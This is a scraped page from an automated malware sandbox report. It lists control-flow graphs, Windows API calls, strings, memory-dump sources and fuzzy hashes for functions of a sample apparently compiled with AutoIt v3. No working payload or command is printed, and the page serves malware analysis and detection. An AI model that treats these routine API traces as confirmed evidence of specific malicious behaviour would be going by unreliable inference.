                                                            Function 00007FF7EC125DEC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 143windowtimeregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 131 7ff7ec125dec-7ff7ec125e21 133 7ff7ec125e91-7ff7ec125e94 131->133 134 7ff7ec125e23-7ff7ec125e26 131->134 133->134 137 7ff7ec125e96 133->137 135 7ff7ec125e98 134->135 136 7ff7ec125e28-7ff7ec125e2f 134->136 138 7ff7ec16c229-7ff7ec16c261 call 7ff7ec13ede4 call 7ff7ec142c44 135->138 139 7ff7ec125e9e-7ff7ec125ea3 135->139 140 7ff7ec125f21-7ff7ec125f29 PostQuitMessage 136->140 141 7ff7ec125e35-7ff7ec125e3a 136->141 142 7ff7ec125e6b-7ff7ec125e76 DefWindowProcW 137->142 178 7ff7ec16c267-7ff7ec16c26e 138->178 143 7ff7ec125ecc-7ff7ec125efa SetTimer RegisterWindowMessageW 139->143 144 7ff7ec125ea5-7ff7ec125ea8 139->144 149 7ff7ec125ec8-7ff7ec125eca 140->149 145 7ff7ec125e40-7ff7ec125e43 141->145 146 7ff7ec16c2af-7ff7ec16c2c5 call 7ff7ec19a40c 141->146 148 7ff7ec125e7c-7ff7ec125e90 142->148 143->149 152 7ff7ec125efc-7ff7ec125f09 CreatePopupMenu 143->152 150 7ff7ec125eae-7ff7ec125ebe KillTimer call 7ff7ec125d88 144->150 151 7ff7ec16c1b8-7ff7ec16c1bb 144->151 153 7ff7ec125e49-7ff7ec125e4e 145->153 154 7ff7ec125f2b-7ff7ec125f35 call 7ff7ec144610 145->154 146->149 171 7ff7ec16c2cb 146->171 149->148 167 7ff7ec125ec3 call 7ff7ec127098 150->167 157 7ff7ec16c1bd-7ff7ec16c1c0 151->157 158 7ff7ec16c1f7-7ff7ec16c224 MoveWindow 151->158 152->149 160 7ff7ec125e54-7ff7ec125e59 153->160 161 7ff7ec16c292-7ff7ec16c299 153->161 173 7ff7ec125f3a 154->173 165 7ff7ec16c1e4-7ff7ec16c1f2 SetFocus 157->165 166 7ff7ec16c1c2-7ff7ec16c1c5 157->166 158->149 169 7ff7ec125f0b-7ff7ec125f1f call 7ff7ec125f3c 160->169 170 7ff7ec125e5f-7ff7ec125e65 160->170 161->142 168 7ff7ec16c29f-7ff7ec16c2aa call 7ff7ec18c54c 161->168 165->149 166->170 174 7ff7ec16c1cb-7ff7ec16c1df call 7ff7ec13ede4 166->174 167->149 168->142 169->149 170->142 170->178 171->142 173->149 174->149 178->142 182 7ff7ec16c274-7ff7ec16c28d call 7ff7ec125d88 call 7ff7ec126258 178->182 182->142
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated
                                                            • API String ID: 129472671-2362178303
                                                            • Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                            • Instruction ID: 1e63f47785080c9ca6d0307f882d2cc42c147392af774170a720d38f0dd32288
                                                            • Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                            • Instruction Fuzzy Hash: 275167BDA0C64381FA28BB25F884379E668AF45B81FC40033D41D862A6EE7CF504D332
                                                            Function 00007FF7EC123D90 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-2659433951
                                                            • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                            • Instruction ID: be8672ed7d01d93adae0ed357807cb65bb729d4152979e28f9503815188bf1e1
                                                            • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                            • Instruction Fuzzy Hash: 82314B7AA18B028AE700EF61F8443AD7BB4FB44759F900136CA5D17B68DF7C9158CB51
                                                            Function 00007FF7EC13E958 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 304comCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 189 7ff7ec13e958-7ff7ec13e9ae 190 7ff7ec1827e4-7ff7ec1827ea DestroyWindow 189->190 191 7ff7ec13e9b4-7ff7ec13e9d3 mciSendStringW 189->191 195 7ff7ec1827f0-7ff7ec182801 190->195 192 7ff7ec13e9d9-7ff7ec13e9e3 191->192 193 7ff7ec13ecbd-7ff7ec13ecce 191->193 194 7ff7ec13e9e9 192->194 192->195 196 7ff7ec13ecf7-7ff7ec13ed01 193->196 197 7ff7ec13ecd0-7ff7ec13ecf0 UnregisterHotKey 193->197 198 7ff7ec13e9f0-7ff7ec13e9f3 194->198 199 7ff7ec182835-7ff7ec18283f 195->199 200 7ff7ec182803-7ff7ec182806 195->200 196->192 202 7ff7ec13ed07 196->202 197->196 201 7ff7ec13ecf2 call 7ff7ec13f270 197->201 204 7ff7ec13e9f9-7ff7ec13ea08 call 7ff7ec123aa8 198->204 205 7ff7ec13ecb0-7ff7ec13ecb8 call 7ff7ec125410 198->205 199->195 203 7ff7ec182841 199->203 206 7ff7ec182808-7ff7ec182811 call 7ff7ec128314 200->206 207 7ff7ec182813-7ff7ec182817 FindClose 200->207 201->196 202->193 213 7ff7ec182846-7ff7ec18284f call 7ff7ec1b8c00 203->213 220 7ff7ec13ea0f-7ff7ec13ea12 204->220 205->198 212 7ff7ec18281d-7ff7ec18282e 206->212 207->212 212->199 217 7ff7ec182830 call 7ff7ec1a3180 212->217 213->220 217->199 220->213 222 7ff7ec13ea18 220->222 223 7ff7ec13ea1f-7ff7ec13ea22 222->223 224 7ff7ec13ea28-7ff7ec13ea32 223->224 225 7ff7ec182854-7ff7ec18285d call 7ff7ec1946cc 223->225 227 7ff7ec13ea38-7ff7ec13ea42 224->227 228 7ff7ec182862-7ff7ec182873 224->228 225->223 229 7ff7ec18288c-7ff7ec18289d 227->229 230 7ff7ec13ea48-7ff7ec13ea76 call 7ff7ec1313e0 227->230 232 7ff7ec18287b-7ff7ec182885 228->232 233 7ff7ec182875 FreeLibrary 228->233 234 7ff7ec1828c9-7ff7ec1828d3 229->234 235 7ff7ec18289f-7ff7ec1828c2 VirtualFree 229->235 242 7ff7ec13ea78 230->242 243 7ff7ec13eabf-7ff7ec13eacc OleUninitialize 230->243 232->228 237 7ff7ec182887 232->237 233->232 234->229 240 7ff7ec1828d5 234->240 235->234 238 7ff7ec1828c4 call 7ff7ec1a321c 235->238 237->229 238->234 245 7ff7ec1828da-7ff7ec1828de 240->245 244 7ff7ec13ea7d-7ff7ec13eabd call 7ff7ec13f1c4 call 7ff7ec13f13c 242->244 243->245 246 7ff7ec13ead2-7ff7ec13ead9 243->246 244->243 245->246 248 7ff7ec1828e4-7ff7ec1828ef 245->248 249 7ff7ec1828f4-7ff7ec182903 call 7ff7ec1a31d4 246->249 250 7ff7ec13eadf-7ff7ec13eaea 246->250 248->246 262 7ff7ec182905 249->262 253 7ff7ec13ed09-7ff7ec13ed18 call 7ff7ec1442a0 250->253 254 7ff7ec13eaf0-7ff7ec13eb22 call 7ff7ec12a07c call 7ff7ec13f08c call 7ff7ec1239bc 250->254 253->254 264 7ff7ec13ed1e 253->264 273 7ff7ec13eb2e-7ff7ec13ebc4 call 7ff7ec1239bc call 7ff7ec12a07c call 7ff7ec1245c8 * 2 call 7ff7ec12a07c * 3 call 7ff7ec1313e0 call 7ff7ec13ee68 call 7ff7ec13ee2c * 3 254->273 274 7ff7ec13eb24-7ff7ec13eb29 call 7ff7ec144c24 254->274 267 7ff7ec18290a-7ff7ec182919 call 7ff7ec193a78 262->267 264->253 272 7ff7ec18291b 267->272 277 7ff7ec182920-7ff7ec18292f call 7ff7ec13e4e4 272->277 273->267 316 7ff7ec13ebca-7ff7ec13ebdc call 7ff7ec1239bc 273->316 274->273 283 7ff7ec182931 277->283 286 7ff7ec182936-7ff7ec182945 call 7ff7ec1a3078 283->286 292 7ff7ec182947 286->292 296 7ff7ec18294c-7ff7ec18295b call 7ff7ec1a31a8 292->296 301 7ff7ec18295d 296->301 304 7ff7ec182962-7ff7ec182971 call 7ff7ec1a31a8 301->304 310 7ff7ec182973 304->310 310->310 316->277 319 7ff7ec13ebe2-7ff7ec13ebec 316->319 319->286 320 7ff7ec13ebf2-7ff7ec13ec08 call 7ff7ec12a07c 319->320 323 7ff7ec13ec0e-7ff7ec13ec18 320->323 324 7ff7ec13ed20-7ff7ec13ed25 call 7ff7ec144c24 320->324 326 7ff7ec13ec8a-7ff7ec13eca9 call 7ff7ec12a07c call 7ff7ec144c24 323->326 327 7ff7ec13ec1a-7ff7ec13ec24 323->327 324->190 337 7ff7ec13ecab 326->337 327->296 330 7ff7ec13ec2a-7ff7ec13ec3b 327->330 330->304 332 7ff7ec13ec41-7ff7ec13ed71 call 7ff7ec12a07c * 3 call 7ff7ec13ee10 call 7ff7ec13ed8c 330->332 347 7ff7ec13ed77-7ff7ec13ed88 332->347 348 7ff7ec182978-7ff7ec182987 call 7ff7ec1ad794 332->348 337->327 351 7ff7ec182989 348->351 351->351
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: DestroySendStringUninitializeUnregisterWindow
                                                            • String ID: close all
                                                            • API String ID: 1992507300-3243417748
                                                            • Opcode ID: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                            • Instruction ID: 148bf74dedb6e574e0774a024f9f90cbb2a9d248a5ed62dfc0e73531430f0bc7
                                                            • Opcode Fuzzy Hash: 0215e1cc10e3ea8240ae12a3d7c0b21f24d7e33af532eefbf93780fbe33f8b49
                                                            • Instruction Fuzzy Hash: AFE11AAAB0DA0281EE59EB16E55037CA360BF95B44FD44073DB0E57291DF38E862C722
                                                            Function 00007FF7EC123B84 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: AutoIt v3
                                                            • API String ID: 423443420-1704141276
                                                            • Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                            • Instruction ID: 5c215c49bda3d857979d06b0dd0f480abf9703e2aaa8cf70cdfcda7176a255fa
                                                            • Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                            • Instruction Fuzzy Hash: 6B31197AA08B42CAE740EB92F8843A8B778BB88755F80043AC99D57718DF7CD054C761
                                                            Function 00007FF7EC167348 Relevance: 13.8, APIs: 9, Instructions: 272fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 419 7ff7ec167348-7ff7ec1673ba call 7ff7ec167078 422 7ff7ec1673bc-7ff7ec1673c4 call 7ff7ec1555b4 419->422 423 7ff7ec1673d3-7ff7ec1673dd call 7ff7ec15e418 419->423 428 7ff7ec1673c7-7ff7ec1673ce call 7ff7ec1555d4 422->428 429 7ff7ec1673f7-7ff7ec167463 CreateFileW 423->429 430 7ff7ec1673df-7ff7ec1673f5 call 7ff7ec1555b4 call 7ff7ec1555d4 423->430 443 7ff7ec16771a-7ff7ec167736 428->443 431 7ff7ec1674eb-7ff7ec1674f6 GetFileType 429->431 432 7ff7ec167469-7ff7ec167470 429->432 430->428 438 7ff7ec1674f8-7ff7ec167533 GetLastError call 7ff7ec155564 CloseHandle 431->438 439 7ff7ec167549-7ff7ec16754f 431->439 435 7ff7ec1674b8-7ff7ec1674e6 GetLastError call 7ff7ec155564 432->435 436 7ff7ec167472-7ff7ec167476 432->436 435->428 436->435 441 7ff7ec167478-7ff7ec1674b6 CreateFileW 436->441 438->428 454 7ff7ec167539-7ff7ec167544 call 7ff7ec1555d4 438->454 446 7ff7ec167556-7ff7ec167559 439->446 447 7ff7ec167551-7ff7ec167554 439->447 441->431 441->435 448 7ff7ec16755e-7ff7ec1675ac call 7ff7ec15e334 446->448 449 7ff7ec16755b 446->449 447->448 457 7ff7ec1675ae-7ff7ec1675ba call 7ff7ec167284 448->457 458 7ff7ec1675c0-7ff7ec1675ea call 7ff7ec166de4 448->458 449->448 454->428 464 7ff7ec1675bc 457->464 465 7ff7ec1675ef-7ff7ec1675f9 call 7ff7ec1604b8 457->465 466 7ff7ec1675ec 458->466 467 7ff7ec1675fe-7ff7ec167643 458->467 464->458 465->443 466->465 468 7ff7ec167665-7ff7ec167671 467->468 469 7ff7ec167645-7ff7ec167649 467->469 472 7ff7ec167718 468->472 473 7ff7ec167677-7ff7ec16767b 468->473 469->468 471 7ff7ec16764b-7ff7ec167660 469->471 471->468 472->443 473->472 475 7ff7ec167681-7ff7ec1676c9 CloseHandle CreateFileW 473->475 476 7ff7ec1676cb-7ff7ec1676f9 GetLastError call 7ff7ec155564 call 7ff7ec15e548 475->476 477 7ff7ec1676fe-7ff7ec167713 475->477 476->477 477->472
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                            • String ID:
                                                            • API String ID: 1617910340-0
                                                            • Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                            • Instruction ID: 68e5f934b92c3563cd39f011f87b5529b94c71954df8295a769ee1bb5b8c5d50
                                                            • Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                            • Instruction Fuzzy Hash: 5AC1D0BAB28B418AEB10DF68E4413AC7761EB48BA8F405236DE2E5B795CF38D055C351
                                                            Function 00007FF7EC1325BC Relevance: 12.4, APIs: 8, Instructions: 442windowtimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 557 7ff7ec1325bc-7ff7ec13263d 561 7ff7ec13287e-7ff7ec1328af 557->561 562 7ff7ec132643-7ff7ec13267c 557->562 564 7ff7ec132680-7ff7ec132687 562->564 565 7ff7ec13268d-7ff7ec1326a1 564->565 566 7ff7ec132856-7ff7ec132876 564->566 568 7ff7ec1326a7-7ff7ec1326bc 565->568 569 7ff7ec17d148-7ff7ec17d14f 565->569 566->561 572 7ff7ec1329c8-7ff7ec1329eb PeekMessageW 568->572 573 7ff7ec1326c2-7ff7ec1326c9 568->573 570 7ff7ec132702-7ff7ec132723 569->570 571 7ff7ec17d155 569->571 586 7ff7ec13276e-7ff7ec1327d2 570->586 587 7ff7ec132725-7ff7ec13272c 570->587 581 7ff7ec17d15a-7ff7ec17d160 571->581 575 7ff7ec1326e8-7ff7ec1326ef 572->575 576 7ff7ec1329f1-7ff7ec1329f5 572->576 573->572 577 7ff7ec1326cf-7ff7ec1326d4 573->577 578 7ff7ec17e285-7ff7ec17e293 575->578 579 7ff7ec1326f5-7ff7ec1326fc 575->579 582 7ff7ec17d1aa-7ff7ec17d1bb 576->582 583 7ff7ec1329fb-7ff7ec132a05 576->583 577->572 584 7ff7ec1326da-7ff7ec1326e2 GetInputState 577->584 585 7ff7ec17e29d-7ff7ec17e2b5 call 7ff7ec13f1c4 578->585 579->570 579->585 588 7ff7ec17d19b 581->588 589 7ff7ec17d162-7ff7ec17d176 581->589 582->575 583->581 590 7ff7ec132a0b-7ff7ec132a1d call 7ff7ec142de8 583->590 584->572 584->575 585->566 627 7ff7ec1327d8-7ff7ec1327da 586->627 628 7ff7ec17e276 586->628 587->586 591 7ff7ec13272e-7ff7ec132738 587->591 588->582 589->588 592 7ff7ec17d178-7ff7ec17d17f 589->592 605 7ff7ec132a1f-7ff7ec132a2d TranslateMessage DispatchMessageW 590->605 606 7ff7ec132a33-7ff7ec132a4f PeekMessageW 590->606 597 7ff7ec13273f-7ff7ec132742 591->597 592->588 598 7ff7ec17d181-7ff7ec17d190 TranslateAcceleratorW 592->598 602 7ff7ec132748 597->602 603 7ff7ec1328b0-7ff7ec1328b7 597->603 598->590 604 7ff7ec17d196 598->604 608 7ff7ec13274f-7ff7ec132752 602->608 609 7ff7ec1328b9-7ff7ec1328cc timeGetTime 603->609 610 7ff7ec1328eb-7ff7ec1328ef 603->610 604->606 605->606 606->575 611 7ff7ec132a55 606->611 613 7ff7ec132758-7ff7ec132761 608->613 614 7ff7ec1328f4-7ff7ec1328fb 608->614 615 7ff7ec17d2ab-7ff7ec17d2b0 609->615 616 7ff7ec1328d2-7ff7ec1328d7 609->616 610->597 611->576 620 7ff7ec132767 613->620 621 7ff7ec17d4c7-7ff7ec17d4ce 613->621 617 7ff7ec17d2f8-7ff7ec17d303 614->617 618 7ff7ec132901-7ff7ec132905 614->618 622 7ff7ec1328dc-7ff7ec1328e5 615->622 623 7ff7ec17d2b6 615->623 616->622 624 7ff7ec1328d9 616->624 625 7ff7ec17d309-7ff7ec17d30c 617->625 626 7ff7ec17d305 617->626 618->608 620->586 622->610 629 7ff7ec17d2bb-7ff7ec17d2f3 timeGetTime call 7ff7ec142ac0 call 7ff7ec1a3a28 622->629 623->629 624->622 630 7ff7ec17d30e 625->630 631 7ff7ec17d312-7ff7ec17d319 625->631 626->625 627->628 632 7ff7ec1327e0-7ff7ec1327ee 627->632 628->578 629->610 630->631 636 7ff7ec17d31b 631->636 637 7ff7ec17d322-7ff7ec17d329 631->637 632->628 635 7ff7ec1327f4-7ff7ec132819 632->635 639 7ff7ec13290a-7ff7ec13290d 635->639 640 7ff7ec13281f-7ff7ec132829 call 7ff7ec132b70 635->640 636->637 641 7ff7ec17d32b 637->641 642 7ff7ec17d332-7ff7ec17d33d call 7ff7ec1442a0 637->642 644 7ff7ec132931-7ff7ec132933 639->644 645 7ff7ec13290f-7ff7ec13291a call 7ff7ec132e30 639->645 651 7ff7ec13282e-7ff7ec132836 640->651 641->642 642->602 642->621 649 7ff7ec132971-7ff7ec132974 644->649 650 7ff7ec132935-7ff7ec132949 call 7ff7ec1366c0 644->650 645->651 657 7ff7ec17dfbe-7ff7ec17dfc0 649->657 658 7ff7ec13297a-7ff7ec132997 call 7ff7ec1301a0 649->658 663 7ff7ec13294e-7ff7ec132950 650->663 655 7ff7ec13299e-7ff7ec1329ab 651->655 656 7ff7ec13283c 651->656 659 7ff7ec1329b1-7ff7ec1329be call 7ff7ec144c24 655->659 660 7ff7ec17e181-7ff7ec17e197 call 7ff7ec144c24 * 2 655->660 664 7ff7ec132840-7ff7ec132843 656->664 661 7ff7ec17dfed-7ff7ec17dff6 657->661 662 7ff7ec17dfc2-7ff7ec17dfc5 657->662 674 7ff7ec13299c 658->674 659->572 660->628 669 7ff7ec17dff8-7ff7ec17e003 661->669 670 7ff7ec17e005-7ff7ec17e00c 661->670 662->664 668 7ff7ec17dfcb-7ff7ec17dfe7 call 7ff7ec133c20 662->668 663->651 671 7ff7ec132956-7ff7ec132966 663->671 672 7ff7ec132849-7ff7ec132850 664->672 673 7ff7ec132b17-7ff7ec132b1d 664->673 668->661 678 7ff7ec17e00f-7ff7ec17e016 call 7ff7ec1b8b98 669->678 670->678 671->651 679 7ff7ec13296c 671->679 672->564 672->566 673->672 680 7ff7ec132b23-7ff7ec132b2d 673->680 674->663 689 7ff7ec17e01c-7ff7ec17e036 call 7ff7ec1a34e4 678->689 690 7ff7ec17e0d7-7ff7ec17e0d9 678->690 684 7ff7ec17e0f4-7ff7ec17e10e call 7ff7ec1a34e4 679->684 680->569 691 7ff7ec17e147-7ff7ec17e14e 684->691 692 7ff7ec17e110-7ff7ec17e11d 684->692 705 7ff7ec17e038-7ff7ec17e045 689->705 706 7ff7ec17e06f-7ff7ec17e076 689->706 693 7ff7ec17e0db 690->693 694 7ff7ec17e0df-7ff7ec17e0ee call 7ff7ec1ba320 690->694 691->672 698 7ff7ec17e154-7ff7ec17e15a 691->698 696 7ff7ec17e135-7ff7ec17e142 call 7ff7ec144c24 692->696 697 7ff7ec17e11f-7ff7ec17e130 call 7ff7ec144c24 * 2 692->697 693->694 694->684 696->691 697->696 698->672 703 7ff7ec17e160-7ff7ec17e169 698->703 703->660 710 7ff7ec17e05d-7ff7ec17e06a call 7ff7ec144c24 705->710 711 7ff7ec17e047-7ff7ec17e058 call 7ff7ec144c24 * 2 705->711 706->672 708 7ff7ec17e07c-7ff7ec17e082 706->708 708->672 715 7ff7ec17e088-7ff7ec17e091 708->715 710->706 711->710 715->690
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                            • String ID:
                                                            • API String ID: 3249950245-0
                                                            • Opcode ID: b0d5c899f7f315bbab548dcb41821af8f2ed58059bb4773332668f9261cfd511
                                                            • Instruction ID: 92f59ec6f707231a921c19f83533423a21177ab9f1794f9a7fb2a030158bc386
                                                            • Opcode Fuzzy Hash: b0d5c899f7f315bbab548dcb41821af8f2ed58059bb4773332668f9261cfd511
                                                            • Instruction Fuzzy Hash: BF22A1BAA0C68286EB64FB24F4443B9A7A0FB45748F954137DA4D47696CF3CE841C723
                                                            Function 00007FF7EC123CBC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 849 7ff7ec123cbc-7ff7ec123d88 CreateWindowExW * 2 ShowWindow * 2
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$Show
                                                            • String ID: AutoIt v3$d$edit
                                                            • API String ID: 2813641753-2600919596
                                                            • Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                            • Instruction ID: 38cc726343106272e342790a88a079cc6ab0abac4b111fabcf9298f4235744d6
                                                            • Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                            • Instruction Fuzzy Hash: 712163B6A2CB41C6EB10DB11F888769B7E0F748799F50423AE64D4A758CFBDD045CB11
                                                            Function 00007FF7EC127EC0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185comCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00007FF7EC142D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7EC127FA5), ref: 00007FF7EC142D8E
                                                              • Part of subcall function 00007FF7EC142D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7EC127FA5), ref: 00007FF7EC142D9C
                                                              • Part of subcall function 00007FF7EC142D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7EC127FA5), ref: 00007FF7EC142DAC
                                                              • Part of subcall function 00007FF7EC142D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7EC127FA5), ref: 00007FF7EC142DBC
                                                              • Part of subcall function 00007FF7EC142D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7EC127FA5), ref: 00007FF7EC142DCA
                                                              • Part of subcall function 00007FF7EC142D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7EC127FA5), ref: 00007FF7EC142DD8
